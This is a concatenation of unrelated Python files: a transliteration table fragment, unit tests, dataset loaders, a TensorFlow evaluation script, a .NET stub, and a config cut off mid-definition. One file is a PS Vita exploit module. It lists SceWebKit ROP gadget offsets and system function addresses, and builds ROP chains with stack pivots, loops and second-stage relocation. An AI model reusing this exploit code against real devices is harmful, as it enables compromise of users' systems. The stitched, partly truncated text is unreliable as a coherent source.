'Lu ', # 0x18
'Sao ', # 0x19
'Jue ', # 0x1a
'Chi ', # 0x1b
'Xi ', # 0x1c
'Guan ', # 0x1d
'Yi ', # 0x1e
'Wen ', # 0x1f
'Ji ', # 0x20
'Chuang ', # 0x21
'Ban ', # 0x22
'Lei ', # 0x23
'Liu ', # 0x24
'Chai ', # 0x25
'Shou ', # 0x26
'Nue ', # 0x27
'Dian ', # 0x28
'Da ', # 0x29
'Pie ', # 0x2a
'Tan ', # 0x2b
'Zhang ', # 0x2c
'Biao ', # 0x2d
'Shen ', # 0x2e
'Cu ', # 0x2f
'Luo ', # 0x30
'Yi ', # 0x31
'Zong ', # 0x32
'Chou ', # 0x33
'Zhang ', # 0x34
'Zhai ', # 0x35
'Sou ', # 0x36
'Suo ', # 0x37
'Que ', # 0x38
'Diao ', # 0x39
'Lou ', # 0x3a
'Lu ', # 0x3b
'Mo ', # 0x3c
'Jin ', # 0x3d
'Yin ', # 0x3e
'Ying ', # 0x3f
'Huang ', # 0x40
'Fu ', # 0x41
'Liao ', # 0x42
'Long ', # 0x43
'Qiao ', # 0x44
'Liu ', # 0x45
'Lao ', # 0x46
'Xian ', # 0x47
'Fei ', # 0x48
'Dan ', # 0x49
'Yin ', # 0x4a
'He ', # 0x4b
'Yan ', # 0x4c
'Ban ', # 0x4d
'Xian ', # 0x4e
'Guan ', # 0x4f
'Guai ', # 0x50
'Nong ', # 0x51
'Yu ', # 0x52
'Wei ', # 0x53
'Yi ', # 0x54
'Yong ', # 0x55
'Pi ', # 0x56
'Lei ', # 0x57
'Li ', # 0x58
'Shu ', # 0x59
'Dan ', # 0x5a
'Lin ', # 0x5b
'Dian ', # 0x5c
'Lin ', # 0x5d
'Lai ', # 0x5e
'Pie ', # 0x5f
'Ji ', # 0x60
'Chi ', # 0x61
'Yang ', # 0x62
'Xian ', # 0x63
'Jie ', # 0x64
'Zheng ', # 0x65
'[?] ', # 0x66
'Li ', # 0x67
'Huo ', # 0x68
'Lai ', # 0x69
'Shaku ', # 0x6a
'Dian ', # 0x6b
'Xian ', # 0x6c
'Ying ', # 0x6d
'Yin ', # 0x6e
'Qu ', # 0x6f
'Yong ', # 0x70
'Tan ', # 0x71
'Dian ', # 0x72
'Luo ', # 0x73
'Luan ', # 0x74
'Luan ', # 0x75
'Bo ', # 0x76
'[?] ', # 0x77
'Gui ', # 0x78
'Po ', # 0x79
'Fa ', # 0x7a
'Deng ', # 0x7b
'Fa ', # 0x7c
'Bai ', # 0x7d
'Bai ', # 0x7e
'Qie ', # 0x7f
'Bi ', # 0x80
'Zao ', # 0x81
'Zao ', # 0x82
'Mao ', # 0x83
'De ', # 0x84
'Pa ', # 0x85
'Jie ', # 0x86
'Huang ', # 0x87
'Gui ', # 0x88
'Ci ', # 0x89
'Ling ', # 0x8a
'Gao ', # 0x8b
'Mo ', # 0x8c
'Ji ', # 0x8d
'Jiao ', # 0x8e
'Peng ', # 0x8f
'Gao ', # 0x90
'Ai ', # 0x91
'E ', # 0x92
'Hao ', # 0x93
'Han ', # 0x94
'Bi ', # 0x95
'Wan ', # 0x96
'Chou ', # 0x97
'Qian ', # 0x98
'Xi ', # 0x99
'Ai ', # 0x9a
'Jiong ', # 0x9b
'Hao ', # 0x9c
'Huang ', # 0x9d
'Hao ', # 0x9e
'Ze ', # 0x9f
'Cui ', # 0xa0
'Hao ', # 0xa1
'Xiao ', # 0xa2
'Ye ', # 0xa3
'Po ', # 0xa4
'Hao ', # 0xa5
'Jiao ', # 0xa6
'Ai ', # 0xa7
'Xing ', # 0xa8
'Huang ', # 0xa9
'Li ', # 0xaa
'Piao ', # 0xab
'He ', # 0xac
'Jiao ', # 0xad
'Pi ', # 0xae
'Gan ', # 0xaf
'Pao ', # 0xb0
'Zhou ', # 0xb1
'Jun ', # 0xb2
'Qiu ', # 0xb3
'Cun ', # 0xb4
'Que ', # 0xb5
'Zha ', # 0xb6
'Gu ', # 0xb7
'Jun ', # 0xb8
'Jun ', # 0xb9
'Zhou ', # 0xba
'Zha ', # 0xbb
'Gu ', # 0xbc
'Zhan ', # 0xbd
'Du ', # 0xbe
'Min ', # 0xbf
'Qi ', # 0xc0
'Ying ', # 0xc1
'Yu ', # 0xc2
'Bei ', # 0xc3
'Zhao ', # 0xc4
'Zhong ', # 0xc5
'Pen ', # 0xc6
'He ', # 0xc7
'Ying ', # 0xc8
'He ', # 0xc9
'Yi ', # 0xca
'Bo ', # 0xcb
'Wan ', # 0xcc
'He ', # 0xcd
'Ang ', # 0xce
'Zhan ', # 0xcf
'Yan ', # 0xd0
'Jian ', # 0xd1
'He ', # 0xd2
'Yu ', # 0xd3
'Kui ', # 0xd4
'Fan ', # 0xd5
'Gai ', # 0xd6
'Dao ', # 0xd7
'Pan ', # 0xd8
'Fu ', # 0xd9
'Qiu ', # 0xda
'Sheng ', # 0xdb
'Dao ', # 0xdc
'Lu ', # 0xdd
'Zhan ', # 0xde
'Meng ', # 0xdf
'Li ', # 0xe0
'Jin ', # 0xe1
'Xu ', # 0xe2
'Jian ', # 0xe3
'Pan ', # 0xe4
'Guan ', # 0xe5
'An ', # 0xe6
'Lu ', # 0xe7
'Shu ', # 0xe8
'Zhou ', # 0xe9
'Dang ', # 0xea
'An ', # 0xeb
'Gu ', # 0xec
'Li ', # 0xed
'Mu ', # 0xee
'Cheng ', # 0xef
'Gan ', # 0xf0
'Xu ', # 0xf1
'Mang ', # 0xf2
'Mang ', # 0xf3
'Zhi ', # 0xf4
'Qi ', # 0xf5
'Ruan ', # 0xf6
'Tian ', # 0xf7
'Xiang ', # 0xf8
'Dun ', # 0xf9
'Xin ', # 0xfa
'Xi ', # 0xfb
'Pan ', # 0xfc
'Feng ', # 0xfd
'Dun ', # 0xfe
'Min ', # 0xff
)
|
11520940
|
import unittest
from katas.beta.count_inversions import count_inversion
class CountInversionsTestCase(unittest.TestCase):
def test_equal_1(self):
self.assertEqual(count_inversion((1, 2, 5, 3, 4, 7, 6)), 3)
def test_equal_2(self):
self.assertEqual(count_inversion((0, 1, 2, 3)), 0)
def test_equal_3(self):
self.assertEqual(count_inversion((1, 2, 3)), 0)
def test_equal_4(self):
self.assertEqual(count_inversion((1, 3, 2)), 1)
def test_equal_5(self):
self.assertEqual(count_inversion((3, 6, 2, 7, 3)), 4)
def test_equal_6(self):
self.assertEqual(count_inversion(()), 0)
def test_equal_7(self):
self.assertEqual(count_inversion((3, 3, 3)), 0)
|
11520942
|
from create_grids import create_grids
from run_model import run_model
from plot_testcase import plot_testcase
#-------------------------------------------------------------------------------
def run_ridging_island_testcase():
# create grids
create_grids()
# run the model
run_model()
# plot test case
plot_testcase()
#-------------------------------------------------------------------------------
if __name__ == "__main__":
run_ridging_island_testcase()
|
11520972
|
from plone.app.layout.icons.icons import CatalogBrainContentIcon
class FontAwesomeIconReplacer(CatalogBrainContentIcon):
""" Custom IContentIcon adapter. This is used by @@ploneview to
determine which icons to render.
We want to prevent the rendering of icons, so that FontAwesome fonts
will render instead.
For example, in folder listing. See
Products.CMFPlone.skins.plone_content.folder_listing.pt
"""
@property
def url(self):
return None
|
11520980
|
from collections import OrderedDict
from rop import Rop, Ret, Load
from relocatable import SceWebKit_base, SceLibKernel_base, SceLibc_base, SceLibHttp_base, SceNet_base, data_base
from util import p32, u32
class Gadgets360:
ldm_r1_stuff = SceWebKit_base + 0x54c8 # 54c8: e891a916 ldm r1, {r1, r2, r4, r8, fp, sp, pc}
blx_r4_pop_r4_r5_r6_pc = SceWebKit_base + 0xbfb91
pop_r0_r1_r2_r3_r4_r5_pc = SceWebKit_base + 0x8dd9b5
pop_r1_r2_r3_r4_pc = SceWebKit_base + 0x860637
ldr_r0_r0_pop_r4_pc = SceWebKit_base + 0x695b1
pop_r2_pc = SceWebKit_base + 0x884b85
pop_r0_pc = SceWebKit_base + 0x927215
ldr_r1_r0_mov_r0_r1_pop_r4_pc = SceWebKit_base + 0x698fb
blx_r4_pop_r4_pc = SceWebKit_base + 0xfcdbb
pop_r0_r1_pc = SceWebKit_base + 0x8e7445
str_r0_r1_pop_r4 = SceWebKit_base + 0x15591b
pop_r1_pc = SceWebKit_base + 0x877235
pop_r4_pc = SceWebKit_base + 0x123
adds_r0_r1 = SceWebKit_base + 0x17a383 # adds r0, r1, r0; bx lr
pop_r5_r6_r7_r8_sb_pc = SceWebKit_base + 0xeb4d5
pop_pc = SceWebKit_base + 0xc048b
ldr_r1_r1_blx_sb = SceWebKit_base + 0x612351
ldrb_r0_r0_pop_r4 = SceWebKit_base + 0x12b5c7
lsls_r0_2_pop_r4 = SceWebKit_base + 0x4523cd # lsls r0, r0, #2 ; pop {r4, pc}
str_r1_r0_pop_r4 = SceWebKit_base + 0x1bd5b
# CMP R0, R4
# BNE loc_82340F94
# MOVS R0, #1
# B locret_82340F96
#loc_82340F94
# MOVS R0, #0
#locret_82340F96
# POP {R4-R6,PC}
cmp_r0_r4 = SceWebKit_base + 0x840b7d
mul_r0_r1_bx_lr = SceWebKit_base + 0x647d35
mov_r0_sp_blx_r2 = SceWebKit_base + 0x1fe63b
mov_r12_r0 = SceLibKernel_base + 0x809 # mov ip, r0 ; bx lr
mov_sp_r12_pop_pc = SceLibKernel_base + 0x1111
pop_r0_to_r5 = SceWebKit_base + 0x8dd9b5
blx_r4_pop_r4 = SceWebKit_base + 0xfcdbb
str_r0_r4_pop_r4 = SceWebKit_base + 0x59a9
bx_lr = SceWebKit_base + 0x575
mov_r8_r0_mov_r0_r7_mov_r1_r6_blx_r2 = SceWebKit_base + 0x21a295 # mov r8, r0 ; adds r0, r7, #0 ; adds r1, r6, #0 ; blx r2
mov_r3_r8_blx_r4 = SceWebKit_base + 0xcf481
blx_r3_pop_r4_pc = SceWebKit_base + 0x10665d
infloop = SceWebKit_base + 0x519
class Functions360:
sceKernelAllocMemBlock = SceLibc_base + 0x3C3AC
sceKernelGetMemBlockBase = SceLibc_base + 0x3C39C
sceKernelCreateThread = SceLibKernel_base + 0xACC9
sceKernelGetThreadInfo = SceLibKernel_base + 0xA791
sceKernelStartThread = SceLibKernel_base + 0xA789
sceKernelWaitThreadEnd = SceLibKernel_base + 0x16FD
sceHttpInit = SceLibHttp_base + 0x92FD
sceHttpCreateTemplate = SceLibHttp_base + 0x947B
sceHttpCreateConnectionWithURL = SceLibHttp_base + 0x950B
sceHttpCreateRequestWithURL = SceLibHttp_base + 0x95FF
sceHttpSendRequest = SceLibHttp_base + 0x9935
sceHttpReadData = SceLibHttp_base + 0x9983
store = SceWebKit_base + 0x106fc5
add = SceWebKit_base + 0x130a15
memcpy = SceLibc_base + 0x13F01
memset = SceLibc_base + 0x14011
sceIoDevctl = SceLibKernel_base + 0xA55D
sceIoDevctl_svc = SceLibKernel_base + 0x690C
sceIoOpen = SceLibKernel_base + 0xA4AD
sceKernelDelayThread = SceLibHttp_base + 0x18544
socket = SceNet_base + 0x27E1
sceNetDumpCreate_svc = SceNet_base + 0x9FE0
sceNetDumpDestroy = SceNet_base + 0x2909
sceNetSyscallIoctl = SceNet_base + 0x9F90
sceNetSyscallControl = SceNet_base + 0xA110
sceNetSyscallClose = SceNet_base + 0x9F60
G = Gadgets360()
F = Functions360()
class Rop360(Rop):
functions = F
def __init__(self):
super().__init__()
# Used by repeat()
self.loop_index = self.pre_alloc_var(4)
self.loop_temp = self.pre_alloc_var(4)
# Used by do_write_data
self.write_data_temp = self.pre_alloc_var(4)
def call_v7(self, func, a0=0, a1=0, a2=0, a3=0, a4=0, a5=0, a6=0):
self.rop += [
G.pop_r0_r1_r2_r3_r4_r5_pc,
a0,
a1,
a2,
a3,
func,
0,
G.blx_r4_pop_r4_r5_r6_pc,
a4,
a5,
a6,
]
def call_rv6(self, func, a0, a1=0, a2=0, a3=0, a4=0, a5=0, a6=0):
assert(a0 is Ret)
self.rop += [
G.pop_r1_r2_r3_r4_pc,
a1,
a2,
a3,
func,
G.blx_r4_pop_r4_r5_r6_pc,
a4,
a5,
a6,
]
def call_lv6(self, func, a0, a1=0, a2=0, a3=0, a4=0, a5=0, a6=0):
assert(isinstance(a0, Load))
self.rop += [
G.pop_r0_r1_r2_r3_r4_r5_pc,
a0,
a1,
a2,
a3,
0,
0,
G.ldr_r0_r0_pop_r4_pc,
func,
G.blx_r4_pop_r4_r5_r6_pc,
a4,
a5,
a6,
]
def call_llv(self, func, a0, a1, a2=0):
assert(isinstance(a0, Load))
assert(isinstance(a1, Load))
self.rop += [
G.pop_r2_pc,
a2,
G.pop_r0_pc,
a1,
G.ldr_r1_r0_mov_r0_r1_pop_r4_pc,
0,
G.pop_r0_pc,
a0,
G.ldr_r0_r0_pop_r4_pc,
func,
G.blx_r4_pop_r4_pc,
0,
]
def write32(self, value, addr):
self.rop += [
G.pop_r0_r1_pc,
value,
addr,
G.str_r0_r1_pop_r4,
0,
]
def infloop(self):
self.rop += [
G.infloop
]
def crash(self):
self.rop += [
0xdead,
]
_call_funcs = OrderedDict([
("vvvvvvv", call_v7),
("rvvvvvv", call_rv6),
("lvvvvvv", call_lv6),
("llv", call_llv),
])
def call_r0(self):
self.rop += [
G.pop_r2_pc,
G.pop_pc,
G.mov_r8_r0_mov_r0_r7_mov_r1_r6_blx_r2,
G.pop_r4_pc,
G.pop_pc,
G.mov_r3_r8_blx_r4,
G.pop_r0_pc,
0,
G.blx_r3_pop_r4_pc,
0,
]
def do_write_data(self, data_binary):
part1 = [
# r0 = sp
G.pop_r2_pc,
G.pop_pc,
G.mov_r0_sp_blx_r2,
# r0 += const
G.pop_r1_pc,
0xDEAD,
]
part2 = [
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# [write_data_temp] = r0
G.pop_r1_pc,
self.write_data_temp,
G.str_r0_r1_pop_r4,
0,
# r1 = [write_data_temp]
G.pop_r1_pc,
self.write_data_temp,
G.pop_r5_r6_r7_r8_sb_pc,
0,
0,
0,
0,
G.pop_pc, # sb
G.ldr_r1_r1_blx_sb,
# (dest) r0 = data_base
G.pop_r0_pc,
data_base,
# (len) r2 = len(data_binary)
G.pop_r2_pc,
len(data_binary),
G.pop_r4_pc,
F.memcpy,
# call memcpy(data_binary, SRC_past_rop, len)
G.blx_r4_pop_r4_pc,
0,
]
part1[-1] = (len(part2 + self.rop) + 2) * 4
# Append data_binary as a series of words at the end of ropchain
for word in range(0, len(data_binary) // 4):
data = data_binary[word*4:(word+1)*4]
num = u32(data)
self.rop.append(num)
# Prepend data_binary writer
self.rop = part1 + part2 + self.rop
def repeat(self, times, body):
#---- Increment index
# [index] += 1
#---- Do loopy thingy
# cmp [index], rop_size_words
# r0 += -1
# -- now R0 == 0 if [index] == rop_size_words, -1 otherwise
# -- set R0 = sp offset if continue to loop, 0 if exiting rop chain
# [temp] = r0
# r0 = sp
# r0 += [temp]
# r0 += const
# -- now r0 contains SP, implementing the IF, and we need to pivot to it
# r12 = r0
# Set loop_index to 0
part1 = [
G.pop_r0_r1_pc,
0,
self.loop_index,
G.str_r0_r1_pop_r4,
0,
]
# body is executed here
# Increment loop index by one, compare it
part2 = [
# [loop_index] += 1
G.pop_r1_pc,
1,
G.pop_r0_pc,
self.loop_index,
G.ldr_r0_r0_pop_r4_pc,
0,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
G.pop_r1_pc,
self.loop_index,
G.str_r0_r1_pop_r4,
0,
# cmp [loop_index], times
G.pop_r0_pc,
self.loop_index,
G.ldr_r0_r0_pop_r4_pc,
times,
G.cmp_r0_r4,
0,
0,
0,
# r0 += -1
G.pop_r1_pc,
0xFFFFFFFF,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# now R0 == 0 if [loop_index] == times, -1 otherwise
# set R0 = sp offset if continue to loop, 0 if exiting rop chain
G.pop_r1_pc,
0xDEAD, # = +(number of |data| before RETURN) * 4 # FILLME
]
part3 = [
G.pop_r4_pc,
G.mul_r0_r1_bx_lr,
G.blx_r4_pop_r4_pc,
0,
# [loop_temp] = r0
G.pop_r1_pc,
self.loop_temp,
G.str_r0_r1_pop_r4,
0,
# r0 = sp
G.pop_r2_pc,
G.pop_pc,
G.mov_r0_sp_blx_r2,
]
part4 = [
# r0 += [loop_temp]
G.pop_r1_pc,
self.loop_temp,
G.pop_r5_r6_r7_r8_sb_pc,
0,
0,
0,
0,
G.pop_pc,
G.ldr_r1_r1_blx_sb,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# r0 += const
G.pop_r1_pc,
0xDEAD, # = (number of |data| after mov_r0_sp-blx_r2 and before RETURN_ADDRESS) * 4 # FILLME
]
part5 = [
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# now r0 contains SP, implementing the IF, and we need to pivot to it
# r12 = r0
G.pop_r4_pc,
G.mov_r12_r0,
G.blx_r4_pop_r4_pc,
0,
G.mov_sp_r12_pop_pc,
# only get here when the loop is complete
]
# fill the FILLMEs
part2[-1] = len(body + part2 + part3 + part4 + part5) * 4
part4[-1] = len(part4 + part5) * 4
self.rop += part1 + body + part2 + part3 + part4 + part5
def relocate_rop(self, rop_base, rop_size_words, bases_base):
"""
Relocates second-stage rop chain... in rop!
Equivalent to:
for x in range(num_words):
rop[x] += bases[relocs[x]]
Yes! Loops and conditions, in rop!
- rop_base: address of pointer to rop base
- rop_size_words: rop size in 4-byte words
- bases_base: address of array of bases: [0, data_base, SceWebKit_base, ...]
"""
# Now's a good time to turn around and close this file, trust me
# ... you've been warned.
# This is where we store current index of the loop
index = self.pre_alloc_var(4)
# This is temporary storage
temp = self.pre_alloc_var(4)
# Summary:
#---- Store reloc base-addr into tmp
# r0 = [index]
# r0 += 4 * rop_size_words
# r0 += [rop_base] < this is pointing to reloc for index's rop word
# r0 = ldrb[r0] * 4
# r0 += bases_base
# r0 = ldr[r0]
# [temp] = r0
#---- Store relocated rop word into tmp
# r0 = [index] * 4
# r0 += [rop_base]
# r0 = [r0]
# r0 += [temp]
# [temp] = r0
#---- Load word from tmp and store it back into the chain
# r0 = [index] * 4
# r0 += [rop_base]
# [r0] = [temp]
self.repeat(rop_size_words, [
# r0 = [index]
G.pop_r0_pc,
index,
G.ldr_r0_r0_pop_r4_pc,
0,
# r0 += 4 * rop_size_words
G.pop_r1_pc,
4 * rop_size_words,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# r0 += [rop_base]
G.pop_r1_pc,
rop_base,
G.pop_r5_r6_r7_r8_sb_pc,
0,
0,
0,
0,
G.pop_pc, # sb
G.ldr_r1_r1_blx_sb,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# r0 = ldrb[r0] * 4
G.ldrb_r0_r0_pop_r4,
0,
G.lsls_r0_2_pop_r4,
0,
# r0 += bases_base
G.pop_r1_pc,
bases_base,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# r0 = ldr[r0]
G.ldr_r0_r0_pop_r4_pc,
0,
# [temp] = r0
G.pop_r1_pc,
temp,
G.str_r0_r1_pop_r4,
0,
# r0 = [index] * 4
G.pop_r0_pc,
index,
G.ldr_r0_r0_pop_r4_pc,
0,
G.lsls_r0_2_pop_r4,
0,
# r0 += [rop_base]
G.pop_r1_pc,
rop_base,
G.pop_r5_r6_r7_r8_sb_pc,
0,
0,
0,
0,
G.pop_pc,
G.ldr_r1_r1_blx_sb,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# r0 = [r0]
G.ldr_r0_r0_pop_r4_pc,
0,
# r0 += [temp]
G.pop_r1_pc,
temp,
G.pop_r5_r6_r7_r8_sb_pc,
0,
0,
0,
0,
G.pop_pc,
G.ldr_r1_r1_blx_sb,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# [temp] = r0
G.pop_r1_pc,
temp,
G.str_r0_r1_pop_r4,
0,
# r0 = [index] * 4
G.pop_r0_pc,
index,
G.ldr_r0_r0_pop_r4_pc,
0,
G.lsls_r0_2_pop_r4,
0,
# r0 += [rop_base]
G.pop_r1_pc,
rop_base,
G.pop_r5_r6_r7_r8_sb_pc,
0,
0,
0,
0,
G.pop_pc, # sb
G.ldr_r1_r1_blx_sb,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# [r0] = [temp]
G.pop_r1_pc,
temp,
G.pop_r5_r6_r7_r8_sb_pc,
0,
0,
0,
0,
G.pop_pc,
G.ldr_r1_r1_blx_sb,
G.str_r1_r0_pop_r4,
0,
# [index] += 1
G.pop_r1_pc,
1,
G.pop_r0_pc,
index,
G.ldr_r0_r0_pop_r4_pc,
0,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
G.pop_r1_pc,
index,
G.str_r0_r1_pop_r4,
0,
])
|
11521015
|
import numpy as np
import tensorflow as tf
from config import Config
import model as _model
from data_loader import get_datasets
import matplotlib.pyplot as plt
plt.style.use("seaborn-darkgrid")
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_string(
"config",
"conf/SML2010.json",
"Path to json file with the configuration to be run",
)
def get_np_array(session, model, next_element):
all_true = []
all_predicted = []
while True:
try:
x, y = session.run(next_element)
predictions = session.run(
model.predictions,
{model.driving_series: x, model.past_history: y},
)
true = np.reshape(y[:, -1], [-1]).tolist()
predicted = np.reshape(predictions, [-1]).tolist()
all_true += true
all_predicted += predicted
except tf.errors.OutOfRangeError:
break
return np.array(all_true), np.array(all_predicted)
def plot(
session, model, train_next_element, val_next_element, test_next_element, name="tmp", show=True
):
train_true, train_predicted = get_np_array(
session, model, train_next_element
)
val_true, val_predicted = get_np_array(session, model, val_next_element)
test_true, test_predicted = get_np_array(session, model, test_next_element)
train_size, val_size, test_size = (
len(train_true),
len(val_true),
len(test_true),
)
plt.figure(figsize=(20, 5))
plt.plot(range(train_size), train_true, label="train true")
plt.plot(range(train_size), train_predicted, label="train predicted")
plt.plot(
range(train_size, train_size + val_size), val_true, label="val true"
)
plt.plot(
range(train_size, train_size + val_size),
val_predicted,
label="val predicted",
)
plt.plot(
range(train_size + val_size, train_size + val_size + test_size),
test_true,
label="test true",
)
plt.plot(
range(train_size + val_size, train_size + val_size + test_size),
test_predicted,
label="test predicted",
)
plt.ylabel("target serie")
plt.xlabel("time steps")
plt.legend(loc="upper left")
if show:
plt.show()
else:
plt.savefig(name, dpi=400)
plt.close()
def evaluate(config):
train_set, val_set, test_set = get_datasets(config, shuffled=False)
train_set = train_set.batch(config.batch_size, drop_remainder=True)
val_set = val_set.batch(config.batch_size, drop_remainder=True)
test_set = test_set.batch(config.batch_size, drop_remainder=True)
model = _model.TimeAttnModel(config)
saver = tf.train.Saver(max_to_keep=1)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
train_iterator = train_set.make_initializable_iterator()
val_iterator = val_set.make_initializable_iterator()
test_iterator = test_set.make_initializable_iterator()
train_next_element = train_iterator.get_next()
val_next_element = val_iterator.get_next()
test_next_element = test_iterator.get_next()
# Restore from last evaluated epoch
print("Restoring from: {}".format(config.log_path / "model-max-ckpt"))
saver.restore(session, str(config.log_path / "model-max-ckpt"))
session.run(train_iterator.initializer)
train_scores = model.evaluate(session, train_next_element)
print("============Train=============")
print("RMSE: {:.5f}".format(train_scores["RMSE"]))
print("MAE: {:.5f}".format(train_scores["MAE"]))
print("MAPE: {:.5f}".format(train_scores["MAPE"]))
session.run(val_iterator.initializer)
val_scores = model.evaluate(session, val_next_element)
print("============Validation=============")
print("RMSE: {:.5f}".format(val_scores["RMSE"]))
print("MAE: {:.5f}".format(val_scores["MAE"]))
print("MAPE: {:.5f}".format(val_scores["MAPE"]))
session.run(test_iterator.initializer)
test_scores = model.evaluate(session, test_next_element)
print("============Test=============")
print("RMSE: {:.5f}".format(test_scores["RMSE"]))
print("MAE: {:.5f}".format(test_scores["MAE"]))
print("MAPE: {:.5f}".format(test_scores["MAPE"]))
session.run(train_iterator.initializer)
session.run(val_iterator.initializer)
session.run(test_iterator.initializer)
plot(
session,
model,
train_next_element,
val_next_element,
test_next_element,
)
def main(argv):
# load hyper-parameters from configuration file
config = Config.from_file(FLAGS.config)
evaluate(config)
if __name__ == "__main__":
tf.app.run(main=main)
|
11521031
|
class RegistryAccessRule(AccessRule):
"""
Represents a set of access rights allowed or denied for a user or group. This class cannot be inherited.
RegistryAccessRule(identity: IdentityReference,registryRights: RegistryRights,type: AccessControlType)
RegistryAccessRule(identity: str,registryRights: RegistryRights,type: AccessControlType)
RegistryAccessRule(identity: IdentityReference,registryRights: RegistryRights,inheritanceFlags: InheritanceFlags,propagationFlags: PropagationFlags,type: AccessControlType)
RegistryAccessRule(identity: str,registryRights: RegistryRights,inheritanceFlags: InheritanceFlags,propagationFlags: PropagationFlags,type: AccessControlType)
"""
@staticmethod
def __new__(self,identity,registryRights,*__args):
"""
__new__(cls: type,identity: IdentityReference,registryRights: RegistryRights,type: AccessControlType)
__new__(cls: type,identity: str,registryRights: RegistryRights,type: AccessControlType)
__new__(cls: type,identity: IdentityReference,registryRights: RegistryRights,inheritanceFlags: InheritanceFlags,propagationFlags: PropagationFlags,type: AccessControlType)
__new__(cls: type,identity: str,registryRights: RegistryRights,inheritanceFlags: InheritanceFlags,propagationFlags: PropagationFlags,type: AccessControlType)
"""
pass
AccessMask=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the access mask for this rule.
"""
RegistryRights=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the rights allowed or denied by the access rule.
Get: RegistryRights(self: RegistryAccessRule) -> RegistryRights
"""
|
11521044
|
import copy
from typing import Dict, Union, List
from pathlib import Path
from zsvision.zs_utils import memcache, concat_features
from typeguard import typechecked
from utils import memory_summary
from base.base_dataset import BaseDataset
class ActivityNet(BaseDataset):
@staticmethod
@typechecked
def dataset_paths(training_file=None) -> Dict[str, Union[str, List[str], Path, Dict]]:
subset_paths = {}
test_splits = {
"val1": "val_1_list.txt",
"val": "val_list.txt",
"public_server_val": "public_server_val.txt",
"public_server_test": "public_server_test.txt",
}
for split_name, fname in test_splits.items():
if training_file is None:
subset_paths[split_name] = {"train": "train_list.txt", "val": fname}
else:
subset_paths[split_name] = {"train": training_file, "val": fname}
feature_names = BaseDataset.common_feat_names()
custom_paths = {
"audio": ["aggregated_audio/vggish-audio-raw.pickle"],
"speech": ["aggregated_speech/goog_w2v-speech-raw.pickle"],
"ocr": ["aggregated_ocr_feats/ocr-w2v.pkl"],
"face": ["aggregated_facefeats_25fps_256px_stride1/face-avg.pickle"],
}
text_feat_paths = BaseDataset.common_text_feat_paths()
text_feat_dir = Path("aggregated_text_feats")
text_feat_paths = {key: text_feat_dir / fname
for key, fname in text_feat_paths.items()}
challenge_text_feat_paths = {}
# include non-standard text features
for text_feat in ("openai", ):
text_feat_names = {key: f"{text_feat}-{key}"
for key in {"train", "val1"}}
text_feat_paths[text_feat] = {key: f"aggregated_text_feats/{val}.pkl"
for key, val in text_feat_names.items()}
challenge_text_feat_paths[text_feat] = \
f"aggregated_text_feats/{text_feat}.pkl"
feature_info = {
"custom_paths": custom_paths,
"feature_names": feature_names,
"subset_list_paths": subset_paths,
"text_feat_paths": text_feat_paths,
"challenge_text_feat_paths": challenge_text_feat_paths,
"raw_captions_path": "raw-captions-train-val_1.pkl",
}
return feature_info
def load_features(self):
root_feat = self.root_feat
if self.distil_params is not None:
self.distil_features = {}
d_base_path = self.distil_params['base_path']
teachers = list(map(lambda x: root_feat / Path(d_base_path + x), self.distil_params['teachers']))
for i, f_name in enumerate(teachers):
self.distil_features[i] = memcache(f_name)
feat_names = {key: self.visual_feat_paths(key) for key in
self.paths["feature_names"]}
feat_names.update(self.paths["custom_paths"])
features = {}
for expert, rel_names in feat_names.items():
if expert not in self.ordered_experts:
continue
feat_paths = tuple([Path(root_feat) / rel_name for rel_name in rel_names])
if len(feat_paths) == 1:
features[expert] = memcache(feat_paths[0])
else:
# support multiple forms of feature (e.g. max and avg pooling). For
# now, we only support direct concatenation
msg = f"{expert}: Only direct concatenation of muliple feats is possible"
print(f"Concatenating aggregates for {expert}....")
assert self.feat_aggregation[expert]["aggregate"] == "concat", msg
axis = self.feat_aggregation[expert]["aggregate-axis"]
x = concat_features.cache_info() # pylint: disable=no-value-for-parameter
print(f"concat cache info: {x}")
features_ = concat_features(feat_paths, axis=axis)
memory_summary()
# Make separate feature copies for each split to allow in-place filtering
features[expert] = copy.deepcopy(features_)
self.features = features
if self.challenge_mode:
self.load_challenge_text_features()
else:
text_feat_paths = self.paths["text_feat_paths"][self.text_feat]
if isinstance(text_feat_paths, dict):
text_features = memcache(root_feat / text_feat_paths["train"])
text_features.update(memcache(
root_feat / text_feat_paths[self.split_name]))
elif isinstance(text_feat_paths, (Path, str)):
text_features = memcache(root_feat / text_feat_paths)
else:
raise TypeError(f"Unexpected type {type(text_feat_paths)}")
self.text_features = text_features
self.raw_captions = memcache(root_feat / self.paths["raw_captions_path"])
def sanity_checks(self):
msg = (f"Expected to have single test caption for ANet, since we assume"
f"that the captions are fused (but using {self.num_test_captions})")
assert self.num_test_captions == 1, msg
|
11521055
|
from .card import Card, Cards, Batch, Deck
from .ranked import Leaderboard
from .match import Match, MatchHistory
from .status import Status
|
11521107
|
from visual_mpc.video_prediction.setup_predictor import setup_predictor
from visual_mpc.video_prediction.vpred_model_interface import VPred_Model_Interface
from video_prediction.models.savp_model import SAVPVideoPredictionModel
import video_prediction
base_dir = video_prediction.__file__
base_dir = '/'.join(str.split(base_dir, '/')[:-2])
modeldir = base_dir + '/robonet_experiments/sawyer/short_context'
configuration = {
